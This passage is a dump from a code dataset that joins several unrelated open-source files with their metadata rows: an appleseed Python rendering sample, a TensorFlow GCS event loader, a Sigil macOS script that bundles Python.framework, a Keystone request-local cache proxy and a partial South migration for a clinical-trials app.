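#     @defer.inlineCallbacks
#     def announceBuild(svc, builderid):
#         yield svc.master.wamp.publish(
#             u"org.buildbot.builds.%d.new" % builderid, {})
#
#     @defer.inlineCallbacks
#     def watchBuilds(svc, onEvent):
#         yield svc.master.wamp.subscribe(onEvent, u"org.buildbot.builds")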
| gpl-2.0 | -304,806,555,623,238,000 | 36.25974 | 98 | 0.65894 | false |
Vertexwahn/appleseed | sandbox/samples/python/basic/basic.py | 1 | 11092 |
#
# This source file is part of appleseed.
# Visit http://appleseedhq.net/ for additional information and resources.
#
# This software is released under the MIT license.
#
# Copyright (c) 2012-2013 Esteban Tovagliari, Jupiter Jazz Limited
# Copyright (c) 2014-2015 Esteban Tovagliari, The appleseedhq Organization
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import math
import signal
import sys
import time
import threading
import appleseed as asr
def build_project():
# Create an empty project.
project = asr.Project('test project')
paths = project.get_search_paths()
paths.append('data')
project.set_search_paths(paths)
# Add default configurations to the project.
project.add_default_configurations()
# Set the number of samples. This is basically the quality parameter: the higher the number
# of samples, the smoother the image but the longer the rendering time.
# todo: fix.
conf = project.configurations()['final']
params = {'uniform_pixel_renderer' : {'samples' : 25}}
# Create a scene.
scene = asr.Scene()
# Create an assembly.
assembly = asr.Assembly("assembly")
#------------------------------------------------------------------------
# Materials
#------------------------------------------------------------------------
# Create a color called "gray" and insert it into the assembly.
GrayReflectance = [0.5, 0.5, 0.5]
assembly.colors().insert(asr.ColorEntity("gray", { 'color_space' : 'srgb' }, GrayReflectance))
# Create a BRDF called "diffuse_gray_brdf" and insert it into the assembly.
assembly.bsdfs().insert(asr.BSDF("lambertian_brdf", "diffuse_gray_brdf", { 'reflectance' : 'gray' }))
# Create a physical surface shader and insert it into the assembly.
assembly.surface_shaders().insert(asr.SurfaceShader("physical_surface_shader", "physical_surface_shader"))
# Create a material called "gray_material" and insert it into the assembly.
assembly.materials().insert(asr.Material("gray_material", { "surface_shader" : "physical_surface_shader",
"bsdf" : "diffuse_gray_brdf" }))
#------------------------------------------------------------------------
# Geometry
#------------------------------------------------------------------------
# Load the scene geometry from disk.
objects = asr.MeshObjectReader.read(project.get_search_paths(), "cube", { 'filename' : 'scene.obj' })
# Insert all the objects into the assembly.
for object in objects:
# Create an instance of this object and insert it into the assembly.
instance_name = object.get_name() + "_inst"
material_names = { "default" : "gray_material", "default2" : "gray_material" }
instance = asr.ObjectInstance(instance_name, {}, object.get_name(), asr.Transformd(asr.Matrix4d.identity()), material_names)
assembly.object_instances().insert(instance)
# Insert this object into the scene.
assembly.objects().insert(object)
#------------------------------------------------------------------------
# Light
#------------------------------------------------------------------------
# Create a color called "light_intensity" and insert it into the assembly.
LightRadiance = [1.0, 1.0, 1.0]
assembly.colors().insert(asr.ColorEntity("light_intensity", { 'color_space' : 'srgb', 'multiplier' : 30.0 }, LightRadiance))
# Create a point light called "light" and insert it into the assembly.
light = asr.Light("point_light", "light", { 'intensity' : 'light_intensity' })
light.set_transform(asr.Transformd(asr.Matrix4d.translation(asr.Vector3d(0.6, 2.0, 1.0))))
assembly.lights().insert(light)
# Create an instance of the assembly and insert it into the scene.
assembly_inst = asr.AssemblyInstance("assembly_inst", {}, assembly.get_name())
assembly_inst.transform_sequence().set_transform(0.0, asr.Transformd(asr.Matrix4d.identity()))
scene.assembly_instances().insert(assembly_inst)
# Insert the assembly into the scene.
scene.assemblies().insert(assembly)
#------------------------------------------------------------------------
# Environment
#------------------------------------------------------------------------
# Create a color called "sky_radiance" and insert it into the scene.
SkyRadiance = [0.75, 0.80, 1.0]
scene.colors().insert(asr.ColorEntity("sky_radiance", { 'color_space' : 'srgb', 'multiplier' : 0.5 }, SkyRadiance))
# Create an environment EDF called "sky_edf" and insert it into the scene.
scene.environment_edfs().insert(asr.EnvironmentEDF("constant_environment_edf", "sky_edf", { 'radiance' : 'sky_radiance' }))
# Create an environment shader called "sky_shader" and insert it into the scene.
scene.environment_shaders().insert(asr.EnvironmentShader("edf_environment_shader", "sky_shader", { 'environment_edf' : 'sky_edf' }))
# Create an environment called "sky" and bind it to the scene.
scene.set_environment(asr.Environment("sky", { "environment_edf" : "sky_edf", "environment_shader" : "sky_shader" }))
#------------------------------------------------------------------------
# Camera
#------------------------------------------------------------------------
# Create a pinhole camera with film dimensions 0.980 x 0.735 in (24.892 x 18.669 mm).
params = { 'film_dimensions' : asr.Vector2f(0.024892, 0.018669), 'focal_length' : 0.035 }
camera = asr.Camera("pinhole_camera", "camera", params)
# Place and orient the camera. By default cameras are located in (0.0, 0.0, 0.0)
# and are looking toward Z- (0.0, 0.0, -1.0).
mat = asr.Matrix4d.rotation(asr.Vector3d(1.0, 0.0, 0.0), math.radians(-20.0))
mat = mat * asr.Matrix4d.translation(asr.Vector3d(0.0, 0.8, 11.0))
camera.transform_sequence().set_transform(0.0, asr.Transformd(mat))
# Bind the camera to the scene.
scene.set_camera(camera)
#------------------------------------------------------------------------
# Frame
#------------------------------------------------------------------------
# Create a frame and bind it to the project.
params = { 'camera' : scene.get_camera().get_name(),
'resolution' : asr.Vector2i(640, 480),
'color_space' : 'srgb' }
project.set_frame(asr.Frame("beauty", params))
# Bind the scene to the project.
project.set_scene(scene)
return project
class RendererController(asr.IRendererController):
def __init__(self):
super(RendererController, self).__init__()
self.__abort = False
def abort_rendering(self):
sys.stdout.write("Aborting rendering\n")
sys.stdout.flush()
self.__abort = True
# This method is called before rendering begins.
def on_rendering_begin(self):
pass
# This method is called after rendering has succeeded.
def on_rendering_success(self):
pass
# This method is called after rendering was aborted.
def on_rendering_abort(self):
pass
# This method is called before rendering a single frame.
def on_frame_begin(self):
pass
# This method is called after rendering a single frame.
def on_frame_end(self):
pass
# This method is called continuously during rendering.
def on_progress(self):
pass
# Return the current rendering status.
def get_status(self):
if self.__abort:
return asr.IRenderControllerStatus.AbortRendering
else:
return asr.IRenderControllerStatus.ContinueRendering
class TileCallback(asr.ITileCallback):
def __init__(self):
super(TileCallback, self).__init__()
# This method is called before a region is rendered.
def pre_render(self, x, y, width, height):
pass
# This method is called after a tile is rendered.
def post_render_tile(self, frame, tile_x, tile_y):
sys.stdout.write('.')
# This method is called after a whole frame is rendered.
def post_render(self, frame):
pass
class RenderThread(threading.Thread):
def __init__(self, renderer):
super(RenderThread, self).__init__()
self.__renderer = renderer
def run(self):
self.__renderer.render()
RENDER_ON_THREAD = True
def main():
# Create a log target that outputs to stderr, and binds it to the renderer's global logger.
# Eventually you will want to redirect log messages to your own target.
# For this you will need to subclass appleseed.ILogTarget.
log_target = asr.ConsoleLogTarget(sys.stderr)
# It is important to keep log_target alive, as the global logger does not
# take ownership of it. In this example, we do that by removing the log target
# when no longer needed, at the end of this function.
asr.global_logger().add_target(log_target)
# Build the project.
project = build_project()
# Create the master renderer.
renderer_controller = RendererController()
# Catch Control-C.
signal.signal(signal.SIGINT, lambda signal, frame: renderer_controller.abort_rendering())
tile_callback = TileCallback()
renderer = asr.MasterRenderer(project,
project.configurations()['final'].get_inherited_parameters(),
renderer_controller,
tile_callback)
# Render the frame.
if RENDER_ON_THREAD:
render_thread = RenderThread(renderer)
render_thread.start()
while render_thread.isAlive():
render_thread.join(0.5) # seconds
else:
renderer.render()
# Save the frame to disk.
project.get_frame().write_main_image("output/test.png")
# Save the project to disk.
asr.ProjectFileWriter().write(project, "output/test.appleseed")
    # Remove the log target we added previously.
asr.global_logger().remove_target(log_target)
if __name__ == "__main__":
main()
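# How this sample is typically run (an assumption based on the paths used above:
# a 'data/scene.obj' mesh next to the script and an existing 'output/' directory):
#
#     python basic.py
#
# The rendered frame is written to output/test.png and the project file to
# output/test.appleseed; press Ctrl-C to abort rendering early.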
| mit | 8,368,787,666,049,666,000 | 38.756272 | 136 | 0.61621 | false |
panmari/tensorflow | tensorflow/python/summary/impl/gcs_file_loader.py | 6 | 2414 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Loads events from a file stored on Google Cloud Storage."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tempfile
from tensorflow.core.util import event_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.platform import app
from tensorflow.python.platform import logging
from tensorflow.python.summary.impl import gcs
from tensorflow.python.util import compat
class GCSFileLoader(object):
"""A GCSFileLoader loads Event protos from a path to GCS storage.
The GCSFileLoader keeps track of the offset in the file, copies the contents
of the file to local disk, reads it, and then immediately deletes the file.
"""
def __init__(self, gcs_path):
if not gcs.IsGCSPath(gcs_path):
raise ValueError('A GCS path is required')
self._gcs_path = gcs_path
self._gcs_offset = 0
def Load(self):
# Create a temp file to hold the contents that we haven't seen yet.
with tempfile.NamedTemporaryFile(prefix='tf-gcs-') as temp_file:
name = temp_file.name
logging.debug('Temp file created at %s', name)
gcs.CopyContents(self._gcs_path, self._gcs_offset, temp_file)
reader = pywrap_tensorflow.PyRecordReader_New(compat.as_bytes(name), 0)
while reader.GetNext():
event = event_pb2.Event()
event.ParseFromString(reader.record())
yield event
logging.debug('No more events in %s', name)
self._gcs_offset += reader.offset()
def main(argv):
if len(argv) != 2:
print('Usage: gcs_file_loader <path-to-gcs-object>')
return 1
loader = GCSFileLoader(argv[1])
for event in loader.Load():
print(event)
if __name__ == '__main__':
app.run()
| apache-2.0 | -8,562,513,424,797,277,000 | 34.5 | 80 | 0.692212 | false |
varlog00/Sigil | src/Resource_Files/python_pkg/osx_add_python_framework.py | 1 | 6952 | #!/usr/bin/env python3
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import (unicode_literals, division, absolute_import,
print_function)
import sys, os, inspect, shutil, platform, site, subprocess
# the destination directory inside Sigil.app
app_dir = os.path.dirname(os.path.realpath(__file__))
app_dir = os.path.join(app_dir, 'Sigil.app','Contents','Frameworks')
# actual version of Python used to build Sigil
build_fwk = os.path.abspath(sys.prefix + '../../../')
# get python version string
pversion = build_fwk.split(os.sep)[-1]
#get library directory and basename
stdlib_dir = os.path.dirname(inspect.getfile(os))
stdlib_name = stdlib_dir.split(os.sep)[-1]
print('build_fwk', build_fwk)
print('pversion', pversion)
print('stdlib_dir', stdlib_dir)
print('stdlib_name', stdlib_name)
print('app_dir', app_dir)
# the main Python.framework directories
fwk_struct = ['Python.framework/Versions/' + pversion + '/lib/' + stdlib_name + '/site-packages',
'Python.framework/Versions/' + pversion + '/bin'
]
def copy_python_stdlibrary(src_dir, dest_dir):
for x in os.listdir(src_dir):
y = os.path.join(src_dir, x)
ext = os.path.splitext(x)[1]
if os.path.isdir(y) and x not in ('test', 'hotshot', 'distutils',
'site-packages', 'idlelib', 'lib2to3', 'dist-packages', '__pycache__'):
shutil.copytree(y, os.path.join(dest_dir, x),
ignore=ignore_in_dirs)
if os.path.isfile(y) and ext in ('.py', '.so'):
shutil.copy2(y, dest_dir)
site_packages = [ ('lxml', 'd'),
('six.py', 'f'),
('html5lib','d'),
('PIL', 'd'),
('regex.py','f'),
('_regex.so','f'),
('_regex.cpython-35m-darwin.so','f'),
('_regex_core.py','f'),
('test_regex.py', 'f'),
('cssselect', 'd'),
('encutils', 'd'),
('cssutils', 'd'),
('webencodings', 'd'), # needed by html5lib
('chardet', 'd')]
def copy_site_packages(packages, site_dest):
for pkg, typ in packages:
found = False
for apath in site.getsitepackages():
if not found and os.path.exists(apath) and os.path.isdir(apath):
apath = os.path.abspath(apath)
for entry in os.listdir(apath):
if entry == pkg:
if typ == 'd' and os.path.isdir(os.path.join(apath, entry)):
shutil.copytree(os.path.join(apath, entry), os.path.join(site_dest, entry), ignore=ignore_in_dirs)
found = True
break
else:
if os.path.isfile(os.path.join(apath, entry)):
shutil.copy2(os.path.join(apath, entry), os.path.join(site_dest, entry))
found = True
break
else:
break
def ignore_in_dirs(base, items, ignored_dirs=None):
ans = []
if ignored_dirs is None:
ignored_dirs = {'.svn', '.bzr', '.git', 'test', 'tests', 'testing', '__pycache__'}
for name in items:
path = os.path.join(base, name)
if os.path.isdir(path):
# Note: PIL has a .dylibs directory that has no __init__.py in it but does contain *.dylib files
if name in ignored_dirs: # or not os.path.exists(os.path.join(path, '__init__.py')):
ans.append(name)
else:
if name.rpartition('.')[-1] not in ('so', 'py', 'dylib'):
ans.append(name)
return ans
def get_rpaths(path_to_executable):
rpaths = []
raw = subprocess.check_output(['otool', '-l', path_to_executable])
found_rpath = False
for line in raw.splitlines():
if b'LC_RPATH' in line:
found_rpath = True
continue
if found_rpath:
if b'path ' in line:
uline = line.decode('utf-8')
bp = uline.find('path ') + 5
ep = uline.find('(')
rpath = uline[bp:ep].strip()
rpaths.append(rpath)
found_rpath = False
return rpaths
def main():
# create the location inside Sigil.app for Frameworks
os.makedirs(app_dir, exist_ok=True)
# create the basic Python.framework structure
for pth in fwk_struct:
os.makedirs(os.path.join(app_dir, pth), exist_ok=True)
# first copy all python standard library files to their proper place in the framework
dest_dir = os.path.join(app_dir,'Python.framework','Versions', pversion, 'lib', stdlib_name)
copy_python_stdlibrary(stdlib_dir, dest_dir)
# now handle the site-packages separately
dest_dir = os.path.join(app_dir,'Python.framework','Versions', pversion, 'lib', stdlib_name, 'site-packages')
copy_site_packages(site_packages, dest_dir)
# next copy the bin
src_file = os.path.join(build_fwk, 'bin', 'python3')
dest_file = os.path.join(app_dir, 'Python.framework', 'Versions', pversion, 'bin', 'python3')
shutil.copy2(src_file, dest_file)
# next copy the framework (dylib itself) itself
src_file = os.path.join(build_fwk, 'Python')
dest_file = os.path.join(app_dir, 'Python.framework','Versions', pversion, 'Python')
shutil.copy2(src_file, dest_file)
# copy the Resources recursively
# Note: for copytree to work, the destination must NOT already exist
src_dir = os.path.join(build_fwk, 'Resources')
dest_dir = os.path.join(app_dir, 'Python.framework','Versions', pversion, 'Resources')
shutil.copytree(src_dir, dest_dir)
# now create proper symlinks to make everything work
src_dir = os.path.join(app_dir, 'Python.framework/Versions')
os.chdir(src_dir)
os.symlink(pversion, 'Current')
src_dir = os.path.join(app_dir, 'Python.framework')
os.chdir(src_dir)
os.symlink(os.path.join('Versions','Current', 'Python'), 'Python')
os.symlink(os.path.join('Versions', 'Current', 'Resources'), 'Resources')
os.chdir(os.path.join(app_dir, 'Python.framework', 'Versions', pversion, 'lib'))
dylibname = 'libpython' + pversion + 'm.dylib'
os.symlink('../Python', dylibname)
# finally change any Python.framework rpaths in the Sigil executable to point to the new local Python.framework
sigil_executable_path = os.path.abspath(os.path.join(app_dir,'..','MacOS','Sigil'))
rpaths = get_rpaths(sigil_executable_path)
for rpath in rpaths:
if 'Python.framework' in rpath:
new_rpath = '@executable_path/../Frameworks/Python.framework/Versions/' + pversion
subprocess.check_call(['install_name_tool', '-rpath', rpath, new_rpath, sigil_executable_path])
if __name__ == '__main__':
sys.exit(main())
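# Typical invocation (an assumption based on the paths computed above: the script
# sits next to the freshly built Sigil.app bundle and is run with the same
# Python 3 framework that Sigil was built against):
#
#     python3 osx_add_python_framework.py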
| gpl-3.0 | 2,236,093,908,645,464,600 | 39.894118 | 126 | 0.57897 | false |
himanshu-setia/keystone | keystone/common/cache/_context_cache.py | 2 | 4518 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""A dogpile.cache proxy that caches objects in the request local cache."""
from dogpile.cache import api
from dogpile.cache import proxy
from oslo_context import context as oslo_context
from oslo_serialization import msgpackutils
from keystone.models import revoke_model
class _RevokeModelHandler(object):
# NOTE(morganfainberg): There needs to be reserved "registry" entries set
# in oslo_serialization for application-specific handlers. We picked 127
# here since it's waaaaaay far out before oslo_serialization will use it.
identity = 127
handles = (revoke_model.RevokeTree,)
def __init__(self, registry):
self._registry = registry
def serialize(self, obj):
return msgpackutils.dumps(obj.revoke_map,
registry=self._registry)
def deserialize(self, data):
revoke_map = msgpackutils.loads(data, registry=self._registry)
revoke_tree = revoke_model.RevokeTree()
revoke_tree.revoke_map = revoke_map
return revoke_tree
# Register our new handler.
_registry = msgpackutils.default_registry
_registry.frozen = False
_registry.register(_RevokeModelHandler(registry=_registry))
_registry.frozen = True
class _ResponseCacheProxy(proxy.ProxyBackend):
__key_pfx = '_request_cache_%s'
def _get_request_context(self):
# Return the current context or a new/empty context.
return oslo_context.get_current() or oslo_context.RequestContext()
def _get_request_key(self, key):
return self.__key_pfx % key
def _set_local_cache(self, key, value, ctx=None):
# Set a serialized version of the returned value in local cache for
# subsequent calls to the memoized method.
if not ctx:
ctx = self._get_request_context()
serialize = {'payload': value.payload, 'metadata': value.metadata}
setattr(ctx, self._get_request_key(key), msgpackutils.dumps(serialize))
ctx.update_store()
def _get_local_cache(self, key):
# Return the version from our local request cache if it exists.
ctx = self._get_request_context()
try:
value = getattr(ctx, self._get_request_key(key))
except AttributeError:
return api.NO_VALUE
value = msgpackutils.loads(value)
return api.CachedValue(payload=value['payload'],
metadata=value['metadata'])
def _delete_local_cache(self, key):
# On invalidate/delete remove the value from the local request cache
ctx = self._get_request_context()
try:
delattr(ctx, self._get_request_key(key))
ctx.update_store()
except AttributeError: # nosec
# NOTE(morganfainberg): We will simply pass here, this value has
# not been cached locally in the request.
pass
def get(self, key):
value = self._get_local_cache(key)
if value is api.NO_VALUE:
value = self.proxied.get(key)
return value
def set(self, key, value):
self._set_local_cache(key, value)
self.proxied.set(key, value)
def delete(self, key):
self._delete_local_cache(key)
self.proxied.delete(key)
def get_multi(self, keys):
values = {}
for key in keys:
v = self._get_local_cache(key)
if v is not api.NO_VALUE:
values[key] = v
query_keys = set(keys).difference(set(values.keys()))
values.update(dict(
zip(query_keys, self.proxied.get_multi(query_keys))))
return [values[k] for k in keys]
def set_multi(self, mapping):
ctx = self._get_request_context()
for k, v in mapping.items():
self._set_local_cache(k, v, ctx)
self.proxied.set_multi(mapping)
def delete_multi(self, keys):
for k in keys:
self._delete_local_cache(k)
self.proxied.delete_multi(keys)
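# Illustrative wiring sketch (an assumption, not keystone's actual configuration):
# dogpile.cache regions accept proxy backends through the ``wrap`` argument of
# configure(), so the request-local layer above could be attached roughly like this:
#
#     from dogpile.cache import make_region
#     region = make_region().configure(
#         'dogpile.cache.memory',
#         wrap=[_ResponseCacheProxy],
#     )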
| apache-2.0 | -6,136,240,338,083,445,000 | 34.574803 | 79 | 0.644754 | false |
evildmp/arkestra-clinical-studies | arkestra_clinical_studies/xmigrations/0003_auto.py | 1 | 33907 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Removing M2M table for field trialtype on 'ClinicalTrial'
db.delete_table(db.shorten_name('arkestra_clinical_trials_clinicaltrial_trialtype'))
def backwards(self, orm):
# Adding M2M table for field trialtype on 'ClinicalTrial'
m2m_table_name = db.shorten_name('arkestra_clinical_trials_clinicaltrial_trialtype')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('clinicaltrial', models.ForeignKey(orm['arkestra_clinical_trials.clinicaltrial'], null=False)),
('clinicaltrialtype', models.ForeignKey(orm['arkestra_clinical_trials.clinicaltrialtype'], null=False))
))
db.create_unique(m2m_table_name, ['clinicaltrial_id', 'clinicaltrialtype_id'])
models = {
'arkestra_clinical_trials.clinicaltrial': {
'Meta': {'object_name': 'ClinicalTrial'},
'body': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'chief_investigators': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'clinicaltrial_chief_investigators'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts_and_people.Person']"}),
'clinical_centre': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'clinicaltrial_clinical_centres'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts_and_people.Entity']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'external_url': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'clinicaltrial_item'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['links.ExternalLink']"}),
'full_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'funding_body': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'clinicaltrial_funding_bodies'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts_and_people.Entity']"}),
'grant_value': ('django.db.models.fields.CharField', [], {'max_length': '25', 'null': 'True', 'blank': 'True'}),
'hosted_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'clinicaltrial_hosted_events'", 'on_delete': 'models.SET_DEFAULT', 'default': 'None', 'to': "orm['contacts_and_people.Entity']", 'blank': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['filer.Image']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'importance': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'in_lists': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'please_contact': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'clinicaltrial_person'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts_and_people.Person']"}),
'publish_to': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'clinicaltrial_publish_to'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts_and_people.Entity']"}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'short_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'blank': 'True'}),
'sponsor': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'clinicaltrial_sponsors'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['contacts_and_people.Entity']"}),
'status': ('django.db.models.fields.CharField', [], {'default': "'setup'", 'max_length': '25'}),
'summary': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'arkestra_clinical_trials.clinicaltrialentity': {
'Meta': {'object_name': 'ClinicalTrialEntity'},
'clinical_trials_page_intro': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'clinical_trials_page_intro'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
'entity': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'clinical_trial_entity'", 'unique': 'True', 'primary_key': 'True', 'to': "orm['contacts_and_people.Entity']"}),
'menu_title': ('django.db.models.fields.CharField', [], {'default': "'Clinical trials'", 'max_length': '50'}),
'publish_page': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'arkestra_clinical_trials.clinicaltrialtype': {
'Meta': {'object_name': 'ClinicalTrialType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'cms.page': {
'Meta': {'ordering': "('site', 'tree_id', 'lft')", 'object_name': 'Page'},
'changed_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.CharField', [], {'max_length': '70'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'limit_visibility_in_menu': ('django.db.models.fields.SmallIntegerField', [], {'default': 'None', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'moderator_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1', 'blank': 'True'}),
'navigation_extenders': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '80', 'null': 'True', 'blank': 'True'}),
            'page_flags': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['cms.Page']"}),
'placeholders': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cms.Placeholder']", 'symmetrical': 'False'}),
'publication_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'publication_end_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publisher_is_draft': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'publisher_public': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.Page']"}),
'publisher_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
'reverse_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '40', 'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'soft_root': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
